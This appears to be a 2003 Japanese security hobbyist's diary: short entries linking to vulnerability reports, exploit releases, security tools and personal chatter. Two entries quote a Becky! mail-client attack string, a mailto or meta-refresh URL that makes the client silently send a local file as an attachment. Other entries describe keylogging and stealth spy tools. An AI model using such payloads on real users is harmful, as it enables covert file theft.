けんのぼやき

1 The NEW Hacker Test!

Newということで。ここ。

2 17300/tcp

いろいろな所で急に増加したみたいに取り上げられているような雰囲気ですが、個人的には17300/tcpへのスキャンは定期的にあるような気がしないでもない。多少増えたのが継続しているような感じってのはあるかも。私が確認できうる範囲での回線のルータのログを見てもそんな感じがする。つついてくる人はある程度特徴があるような気がしないでもない。とりあえずISCのレポートを広げるとこんな感じ。

3 Beckyの困った仕様。。。

UNYUNさんより。Technical Forum 。 私はmailtoタグは前からいくつかあったような気がするので原則として機能しないようにしてます。つかmailtoタグって使うかしらん？ 例の一部変更したコピペ：mailto:hoge@example.com?Subject=test&X-Becky-Action=send&X-Becky-Attachment=C:\hoge.txt

4 snort の Stream4

みっきーさんより。遠吠え日記。

再構築に失敗することがあるらしいことを確認したらしく、関係の無いパケットと結合しているらしい。

私の動かしているsnortではPOP3のトラヒックが無いからか POP3 PASS overflow attempt 自体見ないなぁ(^^;

5 snortの処理能力検証

が更新されてる。Jemさん。こことここかな。

6 りりーす

iptable 1.2.8

PHP 4.3.2RC2

openssh-3.6.1p2

jstrings-0.21

7 めも

Introduction to Simple Oracle Auditing

Migrating from Windows NT Server 4.0 to Windows Server 2003

Cyberattacks Monitoring Points TO U.S.

Host-basierte Intrusion Detection-System(PDF)

8 画像に音楽データ隠して配信

『京都府警ハイテク犯罪対策室などは２８日、著作権法違反の疑いで東京都新宿区の無職少年（１８）＝同法違反容疑で逮捕＝を追送検した。』そうです。ここ。

やべZAKZAKだよ(笑

9 Fluffi Bunni

捕まったそうだ。ここ。

10 来日外国人犯罪の現状（平成１４年中）

ずいぶん細かいなぁ。後で見よう。ここ。

11 住基ネット

住基ネットのおかげで住民票の写しの提出が不要になるんだ。へー。そうなんだ。ここ。

12 追跡 インターネットが赤化されている

Vladimirさんによる月刊朝鮮4月号記事の訳。ここ。

13 802.11a/b/g

をサポートする無線LANカードだそうだ。ORiNOCO 802.11a/b/g ComboCard Gold。

いい加減無線LANカード買いたいナァ。

14 映画化

ですか。東野圭吾の『ゲームの名は誘拐』はまだ読んでないや。最近読んだ小説は井上夢人の『オルファトグラム』のみでほとんど読んでないナァ。。。

お、東野圭吾公式HPなんてあるんだ。いつできたのだろう。

tf.より。

15 岡田斗司夫

と言えばBSマンガ夜話だ。

秘密のLinux日記より。

16 例のトランプ(笑

興味深い。見るべし。ここ。

読冊日記より。

17 猫

なんというか(^^; ここ。

もにゅ？（っ・ω・）っ より。

18 長男

結城さんがお子さんの長男とのやりとり。こんなお父さんだと頭が柔らかくなりそう。ここ。

19 八百比丘尼

国際日本文化研究センターの怪異・妖怪伝承データベースで検索してみました。たくさんでてきちゃいました。。。ここ。

詩子さんところへ。

20 黒装束オフ

があるそうです(^^; こういうのをするのは微妙にどっちもどっちって感じがしなくもない。ここ。

何ヶ月か前に何かのメールマガジンで電磁波攻撃を受けているってなネタ？と思うようなサイトを見たのですが、今回のあの方々関係だったのかしら。あとで探ってあったらリンクを追加しようかしら。

hard で loxse な 日々 より。

あと『千乃正法白装束電波資料』もついでにリンク。

21 アイコン

熱いアイコンだ。ガンダム、戦車、航空機等にピンときたら。ここ。

ガンダムと言えば、『ガンダムうぉーかー』って特番がやったらしいのだが見逃してしまった。ここ。

22 HotWired

にセキュリティ系の記事が今日はやけに多いなと思ったら、『記事は「ウェブセキュリティー」特集として再編集されたものです。』が。

23 保釈情報

MaDさんから。なんだろ(^^;

アカデメイア雑談掲示板より。

24 X-Force

のRiskの記号が変わった。緑の▽がLow、黄色い□がMedium、赤い△がHigh。なんか微妙だ。

25 インターネット利用高度化委員会（第２２回）

後で見よう。優先度低め。ここ。

26 Kerio Personal Firewall

の穴。日本人の利用者多いだろうな。

Kerio Personal Firewall Administrative Key Exchange Buffer Overflow Allows Remote Users to Execute Arbitrary Code

Kerio Personal Firewall Default Setting Lets Remote Users Send UDP Packets Through the Firewall

27 Netscape Navigator

『"netscape navigator" is cracked.』

28 Crime-Research.org

めもめも。ここ。

1 動く！改造バカ一台

『自ら撮影した貴重な映像とともにお送りする改造バカ流「RSA Conference 2003」リポート。』とのことです。ここ。impressTVより。

決して期待して見ないこと(^^;

2 関心空間

めもめも。ここ。

catさんのDiaryは過去ログ公開はないのかしらん。

3 ２ちゃんねる

『２ちゃんねる、無料の公式ISP「2ちゃんねるプロバイダー」を開始』

本当にネタではなかったのか？(^^;

4 ただでさえ話題になりやすいのに、エイプリルフールを使った事による宣伝効果の高さが２ちゃんねるらしい。。。

5 Trap Server

『Trap Server is an Honey Pot for Microsoft Windows XP, 2000, Me, 98, NT, and 95... which can simulate many differents servers like Apache® HTTP Server , Microsoft® IIS ...』ってな具合なんですが、触ってないですけど ScreenShot を見たところお手軽っぽく使えそう。ここ。

6 安いねぇい

AD1200ってなPCが29,700円(OS無し)だそうですよ。スペックもソコソコですナ。名前もADってな具合ですし(汗 PCDEPOT。 (どこで見つけたネタだっけ。。。) kawaさんもう買うしか(笑

7 sendmail exploit

めも。

・Sendmail 8.12.8 and Below Remote Root Exploit

・Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit

・Exploit for Sendmail Local Root Vulnerability (FreeBSD, -d)

1 References

CERT/CC Vulnerability Note の "RealSystem Server contains buffer overflow" と "RealSystem Proxy contains buffer overflow" の References 。

......

Googleのキャッシュかよ！(笑

そいや最近winなバイナリのexploitがあったなぁ。

2 ROOTSECURE.NET

なんか検索してたら、ズバリの所にいきあたったので問題ないのでしょうが？

http://www.rootsecure.net/ に ?p=admin

きっとWikiスタイルなんだ(^^;

3 あ、ちゃんと左上にEditなリンクがありましたわ。

4 りりーす

・knoppix_20030415-20030430版（ゴールデンウィーク版）

5 ストックオプションが終わる日

ここ

社員持株制度みたいのがあるけど、私はやっていないや。

6 トロイの検出

以前ここでTauscanとかTDS-3とかの類の有用性がよく分からないみたいな事を書いたけれども、何をいまさらだが分かってきた(^^;

・ウイルス検出のソフト

・トロイ検出のソフト

・スパイウェア検出のソフト

・いろんなアップデート

の定期的実施がマメな人は必要なワケなのですね。

7 チェッチェッコリチェッコリ

飲料系のCMだったと思いますが、どうしても頭から離れない。しかも覚えられないのが微妙に悔しいみたいな。

8 →

の飼い主に久方ぶりにお会いした。

9 Becky!

ということで対策されたバージョン Becky! Internet Mail Ver.2 (2.05.11) がリリースです。

/.Jでもネタになっています。

catさんが試していた meta http-equiv="refresh" content="0;URL=mailto:hoge@example.com?Subject=test&X-Becky-Action=send&X-Becky-Attachment=c:\huga.txt" てな方法もあるワケでして(笑 あげとくの吉でせう。

10 Net auction password peddler pinched

何やら日本の事件を取り上げていてソースが Source: mdn.mainichi.co.jp となっていたので、Mainichi INTERACTIVE インターネット事件を追うを見てみると、見あたらないんですよね。インターネット業界トラブルニュースを見ると、『京都府警が「ID屋」初逮捕 (共同)』ってのがあるようだ。ソースの mdn.mainichi.co.jp をあたってみると、これを見つけた。オカシイと思って、毎日新聞のサイトに戻って探ると、Mainichi INTERACTIVE　DIGITALトゥデイから辿れるニュースにあるのでした。Mainichi INTERACTIVE インターネット事件を追うも新着にあわせて更新して欲しいなぁ。。。

11 NetScreen

http://www.netscreen.com/support/alert.html が 『The file you requested was not found.』 ってなっているので、探しちまった。こことここに変更かな。

1 Virus LAB

GaKuToさんのコラム。『2.駆除・修復レベルについて』勉強になるなぁ。

2 角田

昨日のK-1はラスベガスのようですが、角田×武蔵(報知の記事)はなかなかよかったですね(ちょっとK-1っぽくなかったけれど)。去年よりも見た目会場は狭いようにも思いますし、試合の組み方に冒険？若しくは選手を集められなかった？という感がありますが、興行的にはどうったのかな？

3 白装束

がらみの報道でコンクリート柱に電線を丸めているところからの電磁波云々とありましたが、あれは電話線かな(^^; まぁ似たようなものか。仮に人体に電磁波の影響があるとして気にするとしたら高圧電線かな。まぁどうでもいい事ですが。そうそう、一戸建てを買うときに気にするとしたら、鋼管柱やコンクリート柱の位置かな。

4 PostfixとSMTP Authに関する覚え書き

中満さん。ここ。

5 引き続き、POP Before SMTPは過去の遺産。ここ

6 『暗号とセキュリティ入門』（仮題）

結城さんが脱稿したそうだ。ちょっと楽しみ。ここ。

1 過去ログ

をぉ。ありがたいことです。m(_ _)m

2 VBS Worm Generater

読み応えありますね。GaKuToさん。ここ。

3 Honeynet Presentations

『Honeynet Project Overview. This presentation is an overview of the Honeynet Project, what Honeynets are, their value, how they operate, and what we have learned with them. 61 slides, last updated 5 May, 2003. 』 ここ。

4 xfiw.iss.net

ISSが改竄されたらしいですね。『Iss.net webdavized... where is the security?』

5 m(_ _)m

hiro-tさんのアンテナ。

東睦仁さんのよしなしごと。

6 りりーす

smtpscan-0.5

GnuPG1.2.2

7 GnuPG

のリリースには『Key validity bug in GnuPG』が修正されているようだ。

8 InternetExplorer

の穴。マイコンピュータゾーンで動作させることができちゃうらしい。『Microsoft Internet Explorer Web Folder Access Flaw Lets Remote Users Execute Arbitrary Scripting Code in the My Computer Zone』ここ。

マイコンピュータゾーンはデフォルトではInternetExplorerの設定には存在しない。追加の仕方は例えば Kamadaさんのとことか、Eiji James Yoshidaさんのとこ。

9 Top 75 Security Tools

調査結果。ここ。

catさんのところから。

10 そう言えば

各所で紹介されてましたがめもということで。Eiji James Yoshidaさんの『「NT-Committee2緊急コンピュータセキュリティ研究会」講演資料』。めも。

11 AirG_PC監視

ネットワーク間で外部PCから不正にアクセスしてきた時に感知し、ログ保存や相手先にメッセージ送信。ってなソフトウェアらしい。お手軽っぽい。Windowsのフリーウェア。ここ。 あらゆる脅威に備えてセキュリティを強化せよより。

12 SSHTools.com

めも。ここ。

13 BlueCoara

リニューアルしたみたいだ。ここ。

Postfixとかドキュメントが沢山5/5に上がってます。MTAのパフォーマンスとかちょっと興味深かったです。

14 携帯

持っていないので私的に怖さが分かりにくいのですが、『携帯ウイルス？　米で加入者が被害報告』によるとアドレス帳が損傷したとか。これは下手なコンピュータウイルスとかよりも、悲しむ人が多いんだろうな。

15 tcptraceroute

なんてあったんだ。SYNを使ってやるらしい。しらんかった。ここ。

16 Boy 'pregnant' with twin brother

ここ。読冊日記より。

1 高木浩光＠茨城県つくば市 の日記

はてなダイアリー。ここ。

風邪お大事になりょうすけさんとこ経由で知ったwww.textfile.orgより。

何やら tDiary.net にしたかったらしいが募集が終了してたからとある。を、そう言えば第２のtDiary.net 計画があるとか。

2 りりーす

IMail Server 8.0

3 ＩＴメガリンク（情報通信総合リンク集）

総務省。ここ。

4 VineSeed にあげるメモ。

めも。kawaさん。ここ。

5 Webアプリケーションに潜むセキュリティホール

めも。国分さん。ここ。（Ｒ）日記 より。

6 stoneによる踏み台の作成

めも。中満さん。ここ。

(引用：踏み台といっても悪い意味の踏み台ではありません．)

7 @police

『メールサーバソフト（sendmail）の脆弱性(CA-2003-12)の調査結果について』ここ。

8 PWCrack-Xavior

ここ。

> 種別 プログラム

> 主な発病、感染方法 ブルートフォース攻撃/辞書攻撃

> ウイルスの特徴

> ・PWCrack-Xaviorは「有害の可能性のあるアプリケーション」

> として検出されますが、ウイルスやトロイの木馬ではありま

> せん。攻撃者はこのツールを使用してブルートフォース攻撃

> や辞書攻撃を仕掛け、プレーンテキストのパスワードやWWW

> ベースのパスワードを解読します。

で、ものはこれですかね。

ツール紹介サイトより(笑

9 本

翔泳社からデジタル署名

10 【記事削除要請】

悪徳商法マニアックスに産経新聞社デジタルメディア局電子編集部から記事削除要請がきたそうだ。ここ。

11 BB-HG2000

『松下、セキュリティ設定を自動で行なう無線LAN対応ルータ「BB-HG2000」を発表』

実際はどんな具合なのかしらん。

12 WWW.C

『英MS、“世界初”のインターネット対応トイレ』

この記事に何回か行き当たるのですが、どうしてもWWWCと見間違えてしまう。

13 水星

見たいナァ。こっそりこもって…。ここ。/.Jより。

14 Windows Server 2003

私的にはどうでもいい事ですが、急ぐことはないWindows Server 2003への移行とかでも書かれていますが、移行にあたって Service Pack リリースまで待つとよくありますが、移行促進のため Service Pack を既に完了しているというのは如何？(笑 そうすると早すぎた Service Pack のリリースとかって記事が出たりするんだろうな(笑

仮に脆弱性が驚くほど少なく(ありえないが)て、機能追加やバグの修正ばかりの Service Pack しか出せないとなるとどうなるんだろう。

15 Hacker Sticker

ステッカーだそうだ。Price: $3.00 USD 。

忍者？？(笑 ここ。

16 めも

PF: The OpenBSD Packet Filter

Auditing Web Site Authentication, Part Two

17 B-GEEKS

の編集長のインタビュー記事がディープネットに載ってました(「B-GEEKS」休刊の真相〜編集長インタビュー)。売れなかったのが原因とのことで。年内の復刊をお待ちしてます。

18 X-Force Internet Watch Honeypot Modified by USG

例の鯖にコメント入ってます。ここ。

19 無償あっぷぐれーど

おめでとうございます(汗

20 十二国記 紅蓮の標 黄塵の路

PS2にてAVGで登場するらしい。ここ。

AVGはよくやる方ですが、最近やったのは数百円で中古購入したPSやるドラのサンパギータ。エンディングコンプリートするためには同じ場所を何度も見なければならず、微妙に苦痛になりやめてしまうのだよな。

その前にやったのは2000円くらいで中古購入したPS2の監視者。こちらはゲームシステムがとても新鮮でプレイした事が無い人にはお勧め。ただシナリオは微妙にいまいち。

やはり、最近のAVGのヒットは逆転裁判で決まりかと(笑 中古で安価になっているPSのアナザーマインドも楽しいですよ。

1 Backdoor.Fatroj

『トロイの木馬の動作中、Windowsのデスクトップの左上隅に小さな画像が表示され、その場所にあるアイコンが部分的に隠れることがあります。』ってSymantecとこにキャプチャ付きであるのですが、あれ変だ？ってのが分かりやすい。(笑

私の使用しているランチャーに似ている(笑

2 リンクを忘れていた。ここ。

3 CYBERWAR!

まだ全然見てないので分かりませんが、その手のMOVIEみたいだ(汗 ここ。

4 honeyd

Michigan law 絡みで何やら微妙に閉鎖モードなんだ。復帰して欲しいものです。ここ。

5 Scan 28

でてます。ここ。

そいや前回の結果を時間を作ってみてみよう。＜自分

6 WEBDAV Exploits on the rise

ISCから。ここ。

7 Analysis of the ATD OpenSSL Mass Exploiter

例の"GET /sumthin HTTP/1.0"ってやつ(の１つと言った方がいいのかなぁ？)っすかね。ここ

snortのシグネイチャも掲載されてます。

exploitを入手して解凍したら、これってしかられた(笑

8 Kerio Personal Firewall 2.1.4 on Windows XP with SP1 remote exploit

が出てるようだ。ここ。

9 本

『ネットワーク社会の神話と現実　情報は自由を求めている』 ここ。

10 社会保険職員等を装った不審な訪問者にご注意ください！

社会保険庁から。ここ

1 ISS

どうでもいいことですが、g00db0yのような意見もあるということで。

2 日本語化

対応のリリースが間近らしい。何が？(笑

今日は講話チックな１日ですた。

1 宜保愛子さん

ご冥福をお祈りします。『【芸能】“霊視”の宜保愛子さん死去、７１歳』

2 Kerio Personal Firewall

2.1.5が5/9付けでリリースされたようだ。１年ぶりのリリースですな。穴がfixされたようだ。

1 libsafeのヒミツ

めも。毎日のように更新が続く中満さん。ここ。

2 RikaiXUL

Mozilla の プラグインみたいですが ScreenShot を見ると便利っぽいですね。ここ。

妖精現実 フェアリアルより。

3 OpenOffice

OpenOffice.orgの日本語のところ。ここ。

OpenOffice.org 日本語版導入プログラム。ここ。

ZDNetのこの記事から。

4 あー

金曜日からまともに更新チェックしてないので月曜日がきてほしくない。(意味不明 (汗

1 NetBus Grants Remote Access Without Authentication

ということでNetBusに穴です(笑 ここ。

2 Loadable Kernel Module

リンクとか。4ljさんのとこ。ここ。

3 Forensic Focus

が改竄されたらしい。Zone-H.org。

4 第５章 著作物の利用方法

新規掲載。Netlaw。ここ。

5 PHP日本語マニュアル

Windows HTML Helpが公開。ここ。

6 りりーす

Odysseus 1.3.1

samhain 1.7.7

7 twwwscan

の公式サイトなくなっちゃたなぁ。arirangはあるけど。

1 めも

・「不正アクセス行為対策の実態調査」(警察庁)

・「アクセス制御機能に関する技術研究開発の状況等に関する調査」(警察庁)

・ U.S. Information Security Law, Part Three(SecurityFocus)

2 そふとうぇあ

・Portbuster

・SecureTask

・Webserver Stress Tool 他

3 衝撃

とんでもないことだなぁ。朝一でこんな記事読んだからどっと疲れがたまりました(謎

・Top British Spy in IRA Flees as Papers Blow Cover

・Stakeknife: Uncovering the hidden war

・How Stakeknife paved way to defeat for IRA

海外ボツ！Newsより

4 メタモカラーのボールペン

欲しいかも。こすると色が変わるらしい。これ。

hard で loxse な 日々より

5 MGS3

ランボーだな(笑 ここ。

TECHSIDE ヒトリ板。より。

1 IIS5のアレ

なにやら WebDav Exploits Exposed(LURHQ) とか出たりしていたので、20030319に今までメモっていたのも併せて追記してみた。

でもメモだけに記憶とずれがあったり。あれどこだっけみたいな。

2 Writing Secure ASP Scripts

上のを更新していて気づいた。NGSSoftwareから。ここ。

3 本

を明日(正確には今日か)は読もう。HTTPプロトコル

4 火曜日

仕事の合間にしたこと。

5/12なのがでているとのことで、何も知らない状態でたどり着けるかテストしてみた。15分程度でたどり着けた。実際はもちょっと早かったのだけど、それと気付けなかったワナ。

5 盗聴を防止する

かつて無いとんでもない条件で盗聴してEtherealを使ってroot権限を奪うらしい。ここ。

サイトとしてはEtherealを使おう。

ワカラン。仮に電磁波漏えいを小賢しく使ったとしても、盗聴はできてもroot権限は奪えないだろうし。

今日のなんでやねん経由。

6 はじめてのにっき

Sylpheedの作者さんの日記とのこと。ここ。

ただのにっき経由。

7 EVERYDAY PEOPLE

を。よろしくお願いします。m(_ _)m

8 私にとってのここの存在意義に近いです。とはいえ、未だにブックマークはエライ騒ぎですが。

9 馬鹿めと言ってやれ

そうかヤマトだったのか。Googleで検索。

ヤマトは完結編だけが唯一劇場で見た映画です。

りょうすけさんとこ経由。

10 IP Messenger

のやつLACからアドバイザリでてますね。ここ。

11 原因不明

『小中学生学力テストの正答率低下、原因は不明　文科省』

不明ねぇ。。。

12 navy.mil/ncts

改竄されたみたいですね。Zone-H.org。

なんか狙われちゃってるのかな。navy.milがここ。

13 脆弱性な話題

あまり触れられていないようなので、なんとなく更新。

・OpenSSH Remote Root Authentication Timing Side-Channel Weakness

・CAN-2003-0244 netfilter

・IBM AIX sendmail an open-relay by default

1 IP Messenger

のヤツ、CAN-2003-0288ってな具合で。をぉ。

これを機会にIP Messenger世界展開とか(笑

最近で言えばAN HTTPDのXSSをLACの人が見つけた後にBugtraqにポストして、その後に海外の人がAN HTTPDの脆弱性みつけてましたような。

2 FlexTracer

を、これよさげですね。『FlexTracer will monitor any function exported by DLLs and save in HTML, CSV, or TXT formats. 』 ここ。

3 Easy integrity check system

さらにこんなのも。この手のは未だ試したこと無し。。。

『Easy integrity check system is easy to install and use file integrity system. Primarily ment for system administrators to aid in intrusion detection. 』 ここ。

FileCheckerとかもハッケソ。Network版もあるみたいだ。ここ。

4 PWSteal.Snatch

AOL Instant Messenger を装うトロイらしいのですが、Symantec的見分け方が面白いです(笑 ここ。

5 DeletedDomains.com

そゆもの。ここ。ZDNetから。

6 ネームサーバの適切な設定に向けて

の2003年3月 2002年度活動報告がでてます。確認するものを作ったのなら配布してしまえばいいのになぁ。ここ。

7 暗号技術大全

『暗号技術大全』仕様：B5変形判、全856ページ価格：7400円刊行日：5月30日。ここ。

らしいのですが、出版社はどこだろうか。。。園田さんとこより。

8 有望なDoS攻撃対策は「指紋」と「パズル」

最後にオチ付き(笑。ここ。関連(@police)。

9 三人の魔女

と言えば、NHKの海外ドラマ『チャームド 魔女三姉妹』を思い出しますた。一度しかみていないなこれ。詩子さんとこより。

10 あ、フレームの中を更新チェックしているので、左下のホームページへをリンクしてしまいましたm(_ _)m

11 tDiary

そいえば、12:00-13:00と22:00-1:00くらいは重いですね。昔のチャット鯖みたいだ。

12 いろいろ。

■トランプで表現するのが流行らしい。１つ、２つ。読冊日記より。

■二進数。結城さんの日記。ここ。

■Javaによるアルゴリズム事典のサポートページとのこと。ここ。Kamadaさんのところより。

■Matrix 2のサングラスらしい。私にはまず似合わないが(T-T ここ。hard で loxse な 日々 より

■産業構造審議会情報経済分科会情報セキュリティ部会の設置について。ここ。経済産業省より。

■オンライン登記情報提供制度の概要について。ここ。法務省より。

13 navi.mil

Zone-H.orgで記事(Another US NAVY.MIL server hacked by DkD[|| ... BUT THIS TIME US GOV (?)HACKS BACK!!!)になっていて、その中に『There has been a long debate in the hacker underground wether the server was running a Windows system with a fake operating system banner or a Solaris 8, 』とか。興味深い。

14 klez

濃いのがきた。fromがmemo MLですよ(笑

15 さんぐらす

りょうすけさんなら似合いそうだ。

16 6/25

かぁ。職場にセレクトのくるかなぁ。どっちにしろ買うのですが。

『マイクロソフトがWindows Server 2003を正式発表，国内でのパッケージ出荷は6月25日から』ここ。

Web Edition は 他言語対応 ですか。

catさんところより。

1 level15.hackerslab.org

が改竄されたみたいだ(笑 Zone-H.org

2 syunlog レビュー

netsecurityでたりきさんの記事。ここ。port139-mlより。

3 スキャン

Free online Trojan Scanner

4 検索

フリーメールアドレス検索、IPアドレス検索

5 外務省

日本ASEAN CG大使だとか(笑 ここ。詩子さんところより。

6 めも

・Securing Apache: Step-by-Step

・Who's listening on that port?

7 りりーす

Snort 2.0.1 (beta) Build78 Auto Installer

Snort 2.0.1 (beta) Build80 Auto Installer

8 Re: おだててもなにもあげませんよ♪。

そうか、くれないのか…。って違っ(^^;

9 もう、どうかと

「タマちゃん、住民票移して」　朝霞市長が意欲

10 ガンダム

熱狂ッ！ガンダム感涙写真館「ガンダム・ワールド」爆裂レポート せかいのまんなかより。

1 SecurityFriday.com

をぉ。/jp/か盲点だったなぁ。盲点リスト＆更新チェックに入れておこう(^^; ここ。（Ｒ）日記より。

2 山武ニュースリリース。『株式会社山武、ネットワークの不正アクセスを防止するベンチャー企業「セキュリティフライデー株式会社」を社内ベンチャー制度で設立』ここ。素人的私見で申し訳ありませんが、売上見込すごいなぁ。コンピュータセキュリティ日記より。

3 暗号技術大全

こことかここ。園田さんとこより。

4 スペシャルねこまんま57号

汎用プロセスメモリエディタ兼デバッガ プログラムの解析・改造等に役立つ機能を多数実装。なんてものらしい。ここ。

5 某パナウェーブの海外の記事

Cult admits it may have mixed up its Armageddon dates ここ。

6 北朝鮮

北朝鮮が「ハッカー１００人」を毎年育成　韓国軍幹部

7 explorer.exe

の穴。Buffer overflow in Explorer.exe on Windows XP SP1。

8 go.jp

■電報を用いた債権取り立てへの対処方法について — 身に覚えのない債権取り立ての脅迫電報の受け取り拒否等 — 総務省より。

■情報セキュリティ監査企業台帳への登録について 経済産業省より。

■子ども防犯テキスト「みんなで気をつけようね」 警察庁より

■日本の薬物情勢 〜薬物乱用のない社会を〜 警察庁より

■「ドン・キホーテ　/　デフレを嘲笑う“非連続型業態”の成長&革新方程式とは −ゼロからの創業・発展を支える「起業家精神」と「知恵」− 独立行政法人 経済産業研究所より

9 りりーす

NetEnum Version 4.85 FREE

Mozilla Firebird 0.6

10 第二βユーザ募集

tDiary.Net β募集。現tDiary.netユーザ対象で20人とのこと。ここ。

βテスターとして期待する人ってのがあったらしいがどんなのだったのだろうか。

11 寝違えて

駄目だー。体調下降中。。。

1 Forensic

フォレンジックということで。講師の伊原さん、みっきーさんお疲れ様でした。準備された伊原さん他お疲れ様＆有り難うございました。

フォレンジックの重要性を訴えるのは私の勤務先はまだ難しそうだなぁ。。。正確に言うとそれが必要なところに達していないと言うか。。。

2 IRC

やってみたことないですが、ちょこっとやってみようかしらん。

1 βテスト

としての移行のため、5/19にちょっとアクセスできなくなったりします。

URL自体は変わりません。

2 iplog.confファイルの設定

Jemさん。ここ。

3 jail環境のPostfix

なかみつさん。ここ。

4 警告文

例の米当局、スパム対策でオープンリレーサーバに警告文って日本語版 PDFの警告文もあるんですね。

5 ネット集団自殺

を防いだらしい。お父さんが子供のメールを見て気づいたとか。こここ。

6 焼き破り

窓ガラスにライターの火、『焼き破り』で３人の男逮捕 -新たな侵入盗の手口として急増、埼玉県警- だとか。いろんな手法があるですね。ここ。

7 キャラバン隊員の募集広告

ここ。 お笑いパソコン日誌より。

これって最低賃金とか労働基準法に抵触しそうだなぁ(笑

8 ExcelEverywhere for HTML

ExcelEverywhere for HTML converts an Excel spreadsheet into a HTML-page with embedded JavaScript. No programming or web design experience is required in order to use ExcelEverywhere for HTML.

面白そう。ここ。

ぐは、ちゃんとリンクしてへんかった。。。

9 Port139勉強会

の資料(PDF,WMV)。5/18分。ここ。

10 移転

第二tDiary.netに移転です。スタイルシートを近々修正しよう。気に入らなかったところもいっぱいあったし。

11 スタイルシートの修正挫折ぎみ。。。

1 'Relax, It Was a Honeypot'

ISSが改竄されたのはHoneypotですた、ってヤツに対するコラム。The Register。

2 Alexa

サーチエンジン。トラフィックレポートってのがなかなか面白い。ここ。

トラフィックレポートの例。メジャーなサイトだと日本語で解説されてるような感じがしないでもない。

3 [Document] new: Software uninstall tips

で、日本語タイトルが『パッケージではないソフトウェアの管理』ってな感じで。なかみつさんとこ。

森博嗣の小説をふと思い出した。

4 [Document] Intrusion Detection Systems: An Introduction

さらっとした感じで、まとまっています。なんかの資料に丁度いいかも。LINUXSECURITY.COM。

5 [Document] WLAN Hotspot Best Practices

@stake。

6 ニュース

・Hacker-Turned-Consultant Mitnick Speaks at Expo

・Refactoring Refactoring Iris Recognition Could Mean the End of Physical Privacy

プライバシーってのが入ると途端にやっかいになりますね。

7 [Software] Password Recovery Software

リンク集かな。辞書もある。

8 [Software] udm差分ファイル作成ツール

『udm差分ファイル作成ツールは、ファイル間の相違をチェックして異なる部分のみを抽出しファイルに出力する、差分ファイル作成ツールです。』とのこと。ここ。

9 [Software] PDF tools: Download Shareware

PDF-Creator 2.0 , PDF 2 HTML 1.2 , PDF Editor 1.5 , PDF-Forms 1.2 , PDF-PhotoAlbum 1.0 , PDF-Security 1.0

10 [Software] changedfiles

ここ。tf.より。

11 [Microsoft] Virus Protection Strategies

Anti-Virus Resources, Best Practices, and Current Virus Alerts。

ZDNetより。MS、ワーム対策でセキュリティ2社と連携：『ウイルス対策ソフトメーカーNetwork AssociatesおよびTrend Microと提携し、Microsoftのソフトを標的としたウイルス情報を集約したサイト構築に当たると発表した。 』

12 [Microsoft] Microsoft Enterprise Deployment Conference 2003

『「Microsoft Enterprise Deployment Conference 2003」の基調講演及び各セッションの配信を開始いたしました。』とのことですが、ちょっと見るの面倒くさそう。impress.tv。

13 期待して読んだら

netstat -ano というオチ。[HOWTO] Windows Server 2003 で特定の TCP ポートを使用またはブロックしているプログラムを判別する方法

14 合併

だそうで。中国情報システムサービス株式会社と中国通信ネットワーク株式会社の合併の認可。

15 dialy

う、以前 宇宙人風の改竄とかやっていた(うるおぼえ)ので、これもある意味ネタなのかと思ってましたが、dialyって単語もあるのですね(^^;

16 トイレの紙やっぱ一重　比べれば重くお得

なんて記事があった。我が家は２重だが、どうやら１重の方がお得らしい。１重はなんだか使いにくい。ここ。

そう言えばお笑いパソコン日誌でティッシュの話題が出ていましたが、以前テレビでボックスティッシュが小さくなったという話しから、メーカーに出かけて調べてみると、ティッシュの組み方を工夫することで、同じティッシュの枚数でもボックスティッシュをスリムにすることが可能になったとニュースになっていた。たぶんティッシュの組み方も特許とかあるんだろうな。

1 めもめも

中満さんの日記。ここ。

2 スタイルシート

をとりあえずtDiary1.5用に変更した。

3 [Software] NetBSD Build Under Cygwin

そういうのらしい。

カテゴリが変なのは気にしないで欲しい(^^;;;

4 [Software] ServersCheck

ServersCheck is an enterprise class level reliable solution for monitoring network and systems availability.

フリーウェアのは制限がある。

ハッカージャパンでTIPさんがEventWatcherを紹介していた。フリーウェアはCUIのみ。ネットワーク初心者のためのTCP/IP入門はランキングで上位食い込みまくりみたいですね(笑

5 [Software] XP Logon Password Logger

This software contains low-level keyboard driver for Microsoft Windows 2000/XP operating systems. You must to have administrator rights to install this software. After keyboard driver installation you have to reboot the computer to use this program.

そいうもの。

6 [Software] Stealth Web Page Recorder

Stealth Web Page Recorder is a simple spy software utility for web page recording. This program will be useful if you want to record e-mail messages of any Web Mail service. Also it can record contents of password protected pages and web pages which use secure HTTPS connection. It is absolutely undetectable after the installation.

そいうもの。

7 [Software] Log Tool

Logtool is a command line program that will parse ASCII logfiles into a more palatable format.

例ではsnortのアラートが色づけされたものが提示されている。

8 [Software] Logrep

Logrep is a secure multi-platform framework for the collection, extraction, and presentation of information from various log files.

いろんな(Snort,Squid,Postfix,Apache,Syslog,Iptables,Ipchains,IIS,NT Event log,Trend Micro VirusWall,Checkpoint Firewall-1,Cisco Pix,Microsoft Exchange,NetScreen)のに対応していて、且つWindowsでも動かせるみたい。いつか試そう。

9 [Vuln] Local Netfilter / IPTables IP Queue PID Wrap Flaw

ってことでnetfilter.orgにも上がってました。

10 [Vuln] Microsoft ISA Server XSS (exploit)

テスト用 exploitあり。

11 [Document] セキュアなインターネットサーバー構築に関する調査 IPA

。

12 [law] 白田秀彰のインターネットの法と慣習

Hotwired Japan の連載。バーチャルネット法律娘 真紀奈17歳より。

13 導入コスト

97.3％ウイルス対策ソフトへ不満---最大の理由は「導入コスト」でウイルス対策ソフトへの不満で歳代の理由に導入コストとあげられているが、上位には効果が見えない/対策をしている実感がないというのもある。たぶんそこがキモのような気も。

14 落札

「ヤフオク」不正参加、１１億円分落札　パスワード盗む

> 落札したモノ
> ・横浜港が見える未入居の豪邸（１０億８０００万円）
> ・信州のテニスコート付きペンション（３０００万円）
> ・キャデラック９５年式（１３０万円）
> など２１点。

ほぼこれだけで１１億円。あとはどんなだったのかしらん。ポケットニュースより。

15 ベッカム

の新ヘア(京都新聞)すごいっすね。

さらにそれを真似た高校生が退学処分(CNN)ってのがなんとも(笑

16 勘違い

Today's コラム

> みっきーにタマちゃんの着ぐるみを着せて
> 河原に連れて行くというのはどうでしょうか！！！？？？

誤った想像してしまったのは私だけ？(^^;

17 2ch-Blog

2ch-Blog。某過去ログの方で知った2ch-Blogが募集を再開していた。

18 引っ越し

EVERYDAY PEOPLE

6/1に引っ越し予定だとか。

19 m(_ _)m

juggernautさんのアンテナ、otsuneさんのアンテナ

1 [Software] WebServerFP

